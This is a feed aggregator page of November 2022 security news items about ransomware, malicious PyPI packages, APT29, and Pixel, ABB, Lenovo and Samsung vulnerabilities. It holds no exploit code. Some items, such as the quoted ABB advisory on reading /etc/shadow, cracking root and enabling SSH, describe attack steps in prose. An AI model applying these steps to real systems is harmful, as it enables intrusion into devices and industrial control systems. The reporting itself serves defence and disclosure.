Feed aggregator

Google właśnie załatał błąd… umożliwiający odblokowanie telefonów Pixel bez znajomości PINu. Być może podatni również inni dostawcy telefonów bazujących na Androidzie.

Sekurak.pl - Thu, 11/10/2022 - 14:14

Czy mieliście w życiu sytuację, że nagle zapomnieliście hasła, które machnalnie wpisywaliście już setki razy? Pewien badacz napotkał właśnie ten problem, kiedy jego telefon miał 1% baterii. Po chwili telefon się wyłączył, a po podładowaniu badacz chciał odblokować PINem kartę SIM… ale coś nie szło :/ Poszukał więc kodu PUK,...

Artykuł Google właśnie załatał błąd… umożliwiający odblokowanie telefonów Pixel bez znajomości PINu. Być może podatni również inni dostawcy telefonów bazujących na Androidzie. pochodzi z serwisu Sekurak.

Szpital Matki Polki w Łodzi zainfekowany ransomware. Informują również o „możliwym wycieku”.

Sekurak.pl - Thu, 11/10/2022 - 13:22

O ransomware w Instytucie Centrum Zdrowia Matki Polki w Łodzi informowaliśmy już 2. listopada. Obecnie na stronach szpitala pojawiło się oświadczenie: Jak widać, wskazana została grupa Lockbit 3.0 (to chyba najaktywniejsza grupa ransomware w bieżącym roku). Doszło również do zaszyfrowania kopii zapasowych (standardowa procedura grup ransomware…). Instytut informuje też o...

Artykuł Szpital Matki Polki w Łodzi zainfekowany ransomware. Informują również o „możliwym wycieku”. pochodzi z serwisu Sekurak.

Researchers warn of malicious packages on PyPI using steganography

Security Affairs - Thu, 11/10/2022 - 11:15
Experts discovered a malicious package on the Python Package Index (PyPI) that uses steganographic to hide malware within image files.

CheckPoint researchers discovered a malicious package, named ‘apicolor,’ on the Python Package Index (PyPI) that uses steganographic to hide malware within image files.

The malicious package infects PyPI users through open-source projects on Github. 

The package was uploaded to PyPI on October 31, 2022, it had a vague header stating this is a ‘core lib for REST API’. 

The analysis of the package installation script revealed a code section at the beginning. It starts by manually installing extra requirements, then it downloads an image (“8F4D2uF.png”) hosted on Imgur and uses the newly installed package, called judyb, to process the picture and trigger the processing generated output using the exec command.

“The two packages being manually installed are requests (quite popular helper package for API usage), and judyb. The judib package details initially seem like an ‘in progress’ package, having an empty description and a vague header stating this is ‘a pure Python judyb module’.” reads the analysis published by CheckPoint “A deeper look revealed judib was first released around the same time as apicolor.”

“The judyb code turned out to be a steganography module, responsible hiding and revealing hidden messages inside pictures. Check Point Research suspected that the image downloaded during the apicolor installation may include a hidden part inside of it.”   

The judyb package was used to extract obfuscated Python code hidden in the image, once decoded it retrieves and executes a malicious binary from a remote server.

The experts searched for code projects using the above packages and discovered that apicolor and judib have low usage on GitHub projects.  

Experts recommend to consider only open-source projects with a reputation, taking care of the positive feedback and the number of forks. One of the projects analyzed by the researchers, despite fitting with this criteria, have dozens of stars and hundreds of forks that were synthetically generated. The experts noticed only a single forking account and a set of staring accounts that were used to provide positive feedback to the project as part of the malicious campaign.

“Researchers are seeing a new type of organized attacks. Threat actors have progressed from the ‘mimic a common package and slightly hide your malicious code’ technique. They are creating organized campaigns that directly target certain types of users.” Check Point concludes. “Moving the infection phase from the highly watched PyPI platform to a more crowded domain, such as GitHub, makes detecting malicious packages more difficult. These type of attacks seem to target users working from home, likely individuals who use their corporate machines for side projects.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Moshen Dragon)

The post Researchers warn of malicious packages on PyPI using steganography appeared first on Security Affairs.

Categories: Cyber Security News

Warning: New Massive Malicious Campaigns Targeting Top Indian Banks' Customers

The Hacker News - Thu, 11/10/2022 - 10:50
Cybersecurity researchers are warning of "massive phishing campaigns" that distribute five different malware targeting banking users in India. "The bank customers targeted include account subscribers of seven banks, including some of the most well-known banks located in the country and potentially affecting millions of customers," Trend Micro said in a report published this week. Some of the
Categories: Cyber Security News

Hacker Rewarded $70,000 for Finding Way to Bypass Google Pixel Phones' Lock Screens

The Hacker News - Thu, 11/10/2022 - 10:07
Google has resolved a high-severity security issue affecting all Pixel smartphones that could be trivially exploited to unlock the devices. The vulnerability, tracked as CVE-2022-20465 and reported by security researcher David Schütz in June 2022, was remediated as part of the search giant's monthly Android update for November 2022. "The issue allowed an attacker with physical access to bypass
Categories: Cyber Security News

A bug in ABB Totalflow flow computers exposed oil and gas companies to attack

Security Affairs - Thu, 11/10/2022 - 08:45
A flaw in the ABB Totalflow system used in oil and gas organizations could be exploited by an attacker to inject and execute arbitrary code.

Researchers from industrial security firm Claroty disclosed details of a vulnerability affecting ABB Totalflow flow computers and remote controllers. Flow computers are used to calculate volume and flow rates for oil and gas that are critical to electric power manufacturing and distribution.

The critical systems are widely used by oil and gas organizations worldwide. The vulnerability, CVE-2022-0902 (CVSS score: 8.1), is a path-traversal issue that can be exploited by an attacker to inject and execute arbitrary code.

According to Claroty experts, the vulnerability resides in the implementation of the Totalflow TCP protocol in ABB G5 products.

“Team82 found a high-severity path-traversal vulnerability (CVE-2022-0902) in ABB’s TotalFlow Flow Computers and Remote Controllers. Attackers can exploit this flaw to gain root access on an ABB flow computer, read and write files, and remotely execute code.” reads an advisory published by Claroty.

The industrial automation giant ABB addressed the flaw with the release of firmware updates on July 14, 2022.

The researchers initially discovered an authentication bypass issue, then explored the systems looking at functionalities available to authenticated users such as uploading and downloading configuration files.

Then the experts discovered a path traversal vulnerability by requesting the /etc/shadow file.

Once obtained arbitrary read and write capabilities, the experts easily achieve arbitrary code execution. 

“We chose the simplest approach, reading /etc/shadow and using hashcat cracking the root account password (which turned out to be root:root). Then we changed the SSH configuration file to enable root to connect using password. Then all that was left to do was to turn on the SSH daemon (using the TotalFlow protocol) and to connect to it.” concludes the advisory.

“A successful exploit of this issue could impede a company’s ability to bill customers, forcing a disruption of services, similar to the consequences suffered by Colonial Pipeline following its 2021 ransomware attack.”

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, ABB Totalflow)

The post A bug in ABB Totalflow flow computers exposed oil and gas companies to attack appeared first on Security Affairs.

Categories: Cyber Security News

Researchers Uncover PyPI Package Hiding Malicious Code Behind Image File

The Hacker News - Thu, 11/10/2022 - 07:44
A malicious package discovered on the Python Package Index (PyPI) has been found employing a steganographic trick to conceal malicious code within image files. The package in question, named "apicolor," was uploaded to the Python third-party repository on October 31, 2022, and described as a "Core lib for REST API," according to Israeli cybersecurity firm Check Point. It has since been taken
Categories: Cyber Security News

Is Cybersecurity Awareness Month Anything More Than PR?

The Hacker News - Thu, 11/10/2022 - 07:13
Cybersecurity Awareness Month has been going on since 2004. This year, Cybersecurity Awareness Month urged the public, professionals, and industry partners to "see themselves in cyber" in the following ways:  The public, by taking action to stay safe online. Professionals, by joining the cyber workforce. Cyber industry partners, as part of the cybersecurity solution. CISA outlined four "things
Categories: Cyber Security News

APT29 abused the Windows Credential Roaming in an attack against a diplomatic entity

Security Affairs - Thu, 11/10/2022 - 05:41
Russia-linked APT29 cyberespionage group exploited a Windows feature called Credential Roaming to target a European diplomatic entity.

Mandiant researchers in early 2022 responded to an incident where the Russia-linked APT29 group (aka SVR groupCozy Bear, Nobelium, and The Dukes) successfully phished a European diplomatic entity. The attack stands out for the use of the Windows Credential Roaming feature.

Credential Roaming was introduced by Microsoft in Windows Server 2003 SP1 and is still supported on Windows 11 and Windows Server 2022. The feature is used to roam certificates and other credentials with the user within a domain.

APT29 along with APT28 cyber espionage group was involved in the Democratic National Committee hack and the wave of attacks aimed at the 2016 US Presidential Elections.

In the attack analyzed by Mandiant, the experts observed numerous LDAP queries with atypical properties performed against the Active Directory system.

“The queried LDAP attributes relate to usual credential information gathering (e.g. unixUserPassword); however, one attribute in particular stood out: {b7ff5a38-0818-42b0-8110-d3d154c97f24}, or msPKI-CredentialRoamingTokens, which is which is described by Microsoft as ‘storage of encrypted user credential token BLOBs for roaming’. ” reads the post published by Mandiant. “Upon further inspection, Mandiant identified that this attribute is part of a lesser-known feature of Active Directory: Credential Roaming.”

The researchers discovered an Arbitrary File Write vulnerability, an attacker can exploit the issue to control the msPKIAccountCredentials LDAP attribute and add a malicious Roaming Token entry where the identifier string contains directory traversal characters. Then the attacker can write an arbitrary number of bytes to any file on the file system, posing as the victim account. The report pointed out that the full file name plus directory traversal characters fits within the 92 bytes buffer.

Successful exploitation of the flaw can allow the attacker to achieve remote code execution in the context of the logged-in user.

Mandiant reported the flaw to MSRC in April 2022, the issue tracked as CVE-2022-30170 was addressed by the IT giant on September 13.

The use of Credential Roaming allows attackers to abuse the saved credentials to escalate privileges. Below some attack scenarios that see attackers to abusing Credential Roaming:

  • An organization has not applied the September 2022 patch to each system where Credential Roaming is used.
  • An attacker gained Domain Administrator privileges in an organization where Credential Roaming is in use or was used in the past without proper clean-up.
  • An attacker has access to the cleartext password of a user where Credential Roaming is in use or was in use in the past.
  • An attacker has read access to the msPKIDPAPIMasterKeys attribute on a victim account, but does not have the cleartext password of the victim user.

“Mandiant recommends organizations to check whether Credential Roaming is in use in their environment; and if so, apply the September 2022 patch urgently to remediate CVE-2022-30170.” concludes the report. “Additionally, organizations that have used Credential Roaming in the past should investigate if the proper clean-up process (as described by Microsoft) was followed.”

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, APT29)

The post APT29 abused the Windows Credential Roaming in an attack against a diplomatic entity appeared first on Security Affairs.

Categories: Cyber Security News

Citrix Issues Patches for Critical Flaw Affecting ADC and Gateway Products

The Hacker News - Thu, 11/10/2022 - 05:26
Citrix has released security updates to address a critical authentication bypass flaw in the application delivery controller (ADC) and Gateway that could be exploited to take control of affected systems. Successful exploitation of the issues could enable an adversary to gain authorized access, perform remote desktop takeover, and even circumvent defenses against login brute-force attempts under
Categories: Cyber Security News

High-Severity Flaw Reported in Critical System Used in Oil and Gas Companies

The Hacker News - Thu, 11/10/2022 - 02:49
Cybersecurity researchers have disclosed details of a new vulnerability in a system used across oil and gas organizations that could be exploited by an attacker to inject and execute arbitrary code. The vulnerability, tracked as CVE-2022-0902 (CVSS score: 8.1), is a path-traversal vulnerability in ABB Totalflow flow computers and remote controllers. "Attackers can exploit this flaw to gain root
Categories: Cyber Security News

Re-Focusing Cyber Insurance with Security Validation

The Hacker News - Thu, 11/10/2022 - 02:30
The rise in the costs of data breaches, ransomware, and other cyber attacks leads to rising cyber insurance premiums and more limited cyber insurance coverage. This cyber insurance situation increases risks for organizations struggling to find coverage or facing steep increases. Some Akin Gump Strauss Hauer & Feld LLP's law firm clients, for example, reported a three-fold increase in insurance
Categories: Cyber Security News

Lenovo warns of flaws that can be used to bypass security features

Security Affairs - Thu, 11/10/2022 - 02:21
Lenovo fixed two high-severity flaws impacting various laptop models that could allow an attacker to deactivate UEFI Secure Boot.

Lenovo has released security updates to address a couple of high-severity vulnerabilities impacting various ThinkBook, IdeaPad, and Yoga laptop models. An attacker can exploit the flaws to disable UEFI Secure Boot.

Secure Boot is a security feature of the latest Unified Extensible Firmware Interface (UEFI) 2.3.1 designed to detect tampering with boot loaders, key operating system files, and unauthorized option ROMs by validating their digital signatures. “Detections are blocked from running before they can attack or infect the system specification.”

An attacker that is able to bypass the Secure Boot could bypass any security measure running on the machine and achieve persistence even in case the OS is reinstalled.

The root cause of the flaws is the use of a vulnerable driver during the manufacturing process for some Lenovo devices that was mistakenly not deactivated.

Below are the vulnerabilities that were reported in Lenovo Notebook BIOS.

  • CVE-2022-3430: A potential vulnerability in the WMI Setup driver on some consumer Lenovo Notebook devices may allow an attacker with elevated privileges to modify secure boot setting by modifying an NVRAM variable.
  • CVE-2022-3431: A potential vulnerability in a driver used during manufacturing process on some consumer Lenovo Notebook devices that was mistakenly not deactivated may allow an attacker with elevated privileges to modify secure boot setting by modifying an NVRAM variable.
  • CVE-2022-3432: A potential vulnerability in a driver used during manufacturing process on the Ideapad Y700-14ISK that was mistakenly not deactivated may allow an attacker with elevated privileges to modify secure boot setting by modifying an NVRAM variable.

The vulnerabilities were reported to the vendor by Martin Smolár from ESET.

#ESETResearch discovered and reported to the manufacturer 3 vulnerabilities in the #UEFI firmware of several Lenovo Notebooks. The vulnerabilities allow disabling UEFI Secure Boot or restoring factory default Secure Boot databases (incl. dbx): all simply from an OS. @smolar_m 1/9

— ESET research (@ESETresearch) November 9, 2022

“While disabling UEFI Secure Boot allows direct execution of unsigned UEFI apps, restoring factory default dbx enables the use of known vulnerable bootloaders (e.g., #CVE-2022-34301 found by @eclypsium) to bypass Secure Boot, while keeping it enabled.” reads one of the tweets published by ESET.

The experts pointed out that an attacker can trigger the flaws by simply creating special NVRAM variables. The researcher Nikolaj Schlej recently posted a nice explanation of why and how firmware developers should avoid storing security-sensitive components in NVRAM variables:

Lastly, #CVE-2022-3432 relates to the BdsDxe DXE driver. This driver retrieves the value of the “L05SecBootSmm” NVRAM variable and if the value is 0, it disables UEFI Secure Boot. If the value is 1, it enables Secure Boot and restores factory keys/databases. 8/9 pic.twitter.com/kvmwwZ0dHn

— ESET research (@ESETresearch) November 9, 2022

Owners of the affected devices are highly recommended to update to the latest firmware version. Visiting Lenovo advisory it is possible to determine if a device is affected by these vulnerabilities and receive firmware update instructions.

The firmware versions that fix the vulnerabilities are mentioned under the CVE IDs, so make sure to upgrade to that version or later.

For official Lenovo software, check out this online support portal or run the update tool pre-installed on your computer.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Secure Boot)

The post Lenovo warns of flaws that can be used to bypass security features appeared first on Security Affairs.

Categories: Cyber Security News

New UEFI Firmware Flaws Reported in Several Lenovo Notebook Models

The Hacker News - Thu, 11/10/2022 - 01:36
PC maker Lenovo has addressed yet another set of three shortcomings in the Unified Extensible Firmware Interface (UEFI) firmware affecting several Yoga, IdeaPad, and ThinkBook devices. "The vulnerabilities allow disabling UEFI Secure Boot or restoring factory default Secure Boot databases (incl. dbx): all simply from an OS," Slovak cybersecurity firm ESET explained in a series of tweets. UEFI
Categories: Cyber Security News

Surveillance vendor exploited Samsung phone zero-days

Security Affairs - Wed, 11/09/2022 - 15:51
Google Project Zero researchers reported that a surveillance vendor is using three Samsung phone zero-day exploits.

Google Project Zero disclosed three Samsung phone vulnerabilities, tracked as CVE-2021-25337, CVE-2021-25369 and CVE-2021-25370, that have been exploited by a surveillance company.

The three issues are:

  • CVE-2021-25337: Improper access control in clipboard service in Samsung mobile devices prior to SMR Mar-2021 Release 1 allows untrusted applications to read or write certain local files.
  • CVE-2021-25369: An improper access control vulnerability in sec_log file prior to SMR MAR-2021 Release 1 exposes sensitive kernel information to userspace.
  • CVE-2021-25370: An incorrect implementation handling file descriptor in dpu driver prior to SMR Mar-2021 Release 1 results in memory corruption leading to kernel panic.

The researchers pointed out that the surveillance firm included in its spyware the exploits for these three vulnerabilities that were zero-day at the time of their exploitation.

“This in-the-wild exploit chain is a great example of different attack surfaces and “shape” than many of the Android exploits we’ve seen in the past. All three vulnerabilities in this chain were in the manufacturer’s custom components rather than in the AOSP platform or the Linux kernel.” reads the advisory published by Google Project Zero. “It’s also interesting to note that 2 out of the 3 vulnerabilities were logic and design vulnerabilities rather than memory safety.”

The surveillance vendor chained the above vulnerabilities to compromise the Samsung phones.

The TAG team only obtained a partial exploit chain for Samsung phones that were likely in the testing phase. The experts revealed that the sample is dated back late 2020.

“The chain merited further analysis because it is a 3 vulnerability chain where all 3 vulnerabilities are within Samsung custom components, including a vulnerability in a Java component.” reported the advisory.

The experts explained that the exploit sample targets Samsung phones running kernel 4.14.113 with the Exynos SOC. This specific SOCs is used by phones sold in the Europe and Africa. The exploit relies on both the Mali GPU driver and the DPU driver which are specific to the Exynos Samsung phones.

Samsung phones that were running kernel 4.14.113 in late 2020 include the S10, A50, and A51.

Google reported the vulnerabilities to Samsung immediately after their discovery in late 2020s, and the vendor addressed them in March 2021.

Google did not reveal the name of the surveillance vendor, it only highlighted similarities with other campaigns that targeted Android users is Italy and Kazakhstan.

Project Zero noted that the advisories published by Samsung for these issues do not mention their exploitation in-the-wild.

“Labeling when vulnerabilities are known to be exploited in-the-wild is important both for targeted users and for the security industry. When in-the-wild 0-days are not transparently disclosed, we are not able to use that information to further protect users, using patch analysis and variant analysis, to gain an understanding of what attackers already know.” concludes the report.

“The analysis of this exploit chain has provided us with new and important insights into how attackers are targeting Android devices. It highlights a need for more research into manufacturer specific components.”

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, zero-day)

The post Surveillance vendor exploited Samsung phone zero-days appeared first on Security Affairs.

Categories: Cyber Security News

Phishing automatyczny oparty na narzędziu do scrappingu, które wysyła SMS z fałszywym linkiem zaraz po opublikowaniu nowego ogłoszenia w Allegro lub Lokalnie.

Sekurak.pl - Wed, 11/09/2022 - 14:32

Od czasu do czasu przewija się phishing związany z Allegro i Allegro Lokalnie. Ostatnio pisaliśmy o oszustwie na negatywny komentarz, a wcześniej jeszcze o homografach w nazwie domeny i lewych linkach. Tym razem nieznany cyberzbój napisał scrapper służący do phishingu.  Scrapping jest techniką wydobywania informacji z programu lub aplikacji webowej...

Artykuł Phishing automatyczny oparty na narzędziu do scrappingu, które wysyła SMS z fałszywym linkiem zaraz po opublikowaniu nowego ogłoszenia w Allegro lub Lokalnie. pochodzi z serwisu Sekurak.

Kanał Sportowy TVP zhackowany

Niebezpiecznik.pl - Wed, 11/09/2022 - 11:33
Ktoś przejął konto kanału sportowego TVP na YouTube (celowo do niego nie linkujemy). Usunął z niego wszystkie filmy, zmienił nazwę kanału na “Twitter” i od kilkudziesięciu minut nadaje tam stream z Elonem Muskiem: Na czym polega scam? Popatrzcie na link, który pokazuje się widzom tego podstawionego przez włamywaczy “lajwa”: Widzowie odsyłani są do serwisu, który […]

Duńska kolej zatrzymana przez atak ransomware

Sekurak.pl - Wed, 11/09/2022 - 09:05

DSB, największy operator kolejowy w Danii, w ostatni weekend musiał zatrzymać wszystkie pociągi ze względu na atak na zewnętrznego dostawcę usług IT dla kolei – firmę Supeo. Kilkugodzinny paraliż od rana w sobotę był spowodowany atakiem na platformę Digital Backpack 2, która pozwala motorniczym uzyskiwać kluczowe informacje operacyjne dotyczące zajętości...

Artykuł Duńska kolej zatrzymana przez atak ransomware pochodzi z serwisu Sekurak.

APT29 Exploited a Windows Feature to Compromise European Diplomatic Entity Network

The Hacker News - Wed, 11/09/2022 - 08:47
The Russia-linked APT29 nation-state actor has been found leveraging a "lesser-known" Windows feature called Credential Roaming as part of its attack against an unnamed European diplomatic entity. "The diplomatic-centric targeting is consistent with Russian strategic priorities as well as historic APT29 targeting," Mandiant researcher Thibault Van Geluwe de Berlaere said in a technical write-up.
Categories: Cyber Security News

Experts observed Amadey malware deploying LockBit 3.0 Ransomware

Security Affairs - Wed, 11/09/2022 - 08:31
Experts noticed that the Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems.

Researchers from AhnLab Security Emergency Response Center (ASEC) reported that the Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems, researchers have warned.

Amadey Bot is a data-stealing malware that was first spotted in 2018, it also allows operators to install additional payloads. The malware is available for sale in illegal forums, in the past, it was used by cybercrime gangs like TA505 to install GandCrab ransomware or the FlawedAmmyy RAT.

In July, ASEC researchers discovered that Amadey malware was being distributed by SmokeLoader which was hidden in software cracks and serial generation programs available on multiple sites.

“The ASEC analysis team has confirmed that attackers are using Amadey Bot to install LockBit. ” reads the report published by the security firm. “Amadey Bot, the malware that is used to install LockBit, is being distributed through two methods: one using a malicious Word document file, and the other using an executable that takes the disguise of the Word file icon.”

At the end of October, the researchers discovered the Amadey Bot distributed as a Famous South Korean messenger application named KakaoTalk.

The researchers provided details about two recent distribution cases:

In the first distribution scenario, threat actors used a malicious Word document named “Sia_Sim.docx.” It downloads a Word file that contains a malicious VBA macro, the text body includes an image that prompts the user to click “Enable Content” to enable the VBA macro.

The text body contains an image that prompts the user to click “Enable Content” to enable the VBA macro which in turn runs a PowerShell command to download and run Amadey.

The malicious Microsoft Word document (“심시아.docx“) was uploaded to VirusTotal on October 28, 2022.

In a second distribution case, threat actors disguised the Amadey malware as a seemingly harmless file bearing a Word icon, but is actually an executable (“Resume.exe”). The file is distributed via phishing messages, but at this time ASEC has yet to identify the email used as a lure.

Once installed, Amadey registers to the task scheduler to gain persistence. It connects to the C&C server, sends default information of the infected system, and receives commands.

Experts noticed that Amadey receives three commands from the C2 server. These commands are used to download and execute malware from an external source.

Two commands, “cc.ps1” and “dd.ps1,” are LockBits in powershell form, while a third one named “LBB.exe” is LockBit in exe form.

“Lockbits that are installed via Amadey have been distributed in Korea since 2022, and the team has posted various articles that analyzed the ransomware. The recently confirmed version is LockBit 3.0 which is distributed using keywords such as job application and copyright. Judging from the themes, it appears that the attack is targeting companies.” concludes the report.

“As LockBit ransomware is being distributed through various methods, user caution is advised. Users should update the applications and V3 they use to the latest version and refrain from opening document files from unknown sources.”

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Amadey malware)

The post Experts observed Amadey malware deploying LockBit 3.0 Ransomware appeared first on Security Affairs.

Categories: Cyber Security News

Pages